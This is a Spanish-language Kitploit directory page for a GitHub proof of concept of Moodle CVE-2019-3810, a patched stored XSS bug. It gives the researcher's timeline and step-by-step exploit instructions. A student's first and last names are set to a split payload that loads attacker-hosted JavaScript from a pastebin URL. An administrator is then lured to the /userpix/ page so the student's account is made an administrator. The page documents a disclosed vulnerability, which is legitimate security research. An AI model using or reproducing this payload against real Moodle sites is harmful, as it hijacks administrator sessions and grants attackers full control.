Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC de XSS para escalada de privilegios (de estudiante a administrador) | Kitploit
Herramientas/GitHubGitHub/farisv/moodle-cve-2019-3810
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC de XSS para escalada de privilegios (de estudiante a administrador)

Ver Repositorio
1721hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC para escalada de privilegios (Estudiante a Admin). Este es uno de los errores pasados que descubrí durante un pentest anterior en una institución académica. Fue lo suficientemente exitoso en ese momento para prácticamente robar el acceso de administrador y obtener control total sobre Moodle usando solo un simple error.

Podemos ver en el historial de git que el error existía desde versiones antiguas de Moodle (2003) y se parcheó recién en 2019.

Cronología:

  • Diciembre 2018 - Reporté el error a Moodle
  • Enero 2019 - Parche liberado
  • Abril 2021 - Divulgación del PoC

ADVERTENCIA

SOLO CON FINES EDUCATIVOS. NO USES EL EXPLOIT PARA ACTIVIDADES ILEGALES. EL AUTOR NO ES RESPONSABLE DE NINGÚN USO INDEBIDO O DAÑO.

PoC

  1. Sube payload.js a Pastebin u otro servicio similar. Cambia el valor de userid por tu propio id. Supongamos que la URL es https://pastebin.com/raw/xxxxxxxx.
  2. Inicia sesión en tu cuenta de estudiante.
  3. Establece el nombre con " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Establece el apellido con ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Pide al administrador que abra la página /userpix/ o coloca el enlace a esa página en tu publicación y espera.

Si tiene éxito, tu cuenta se agregará como administrador.

Video de demostración

Descargar herramienta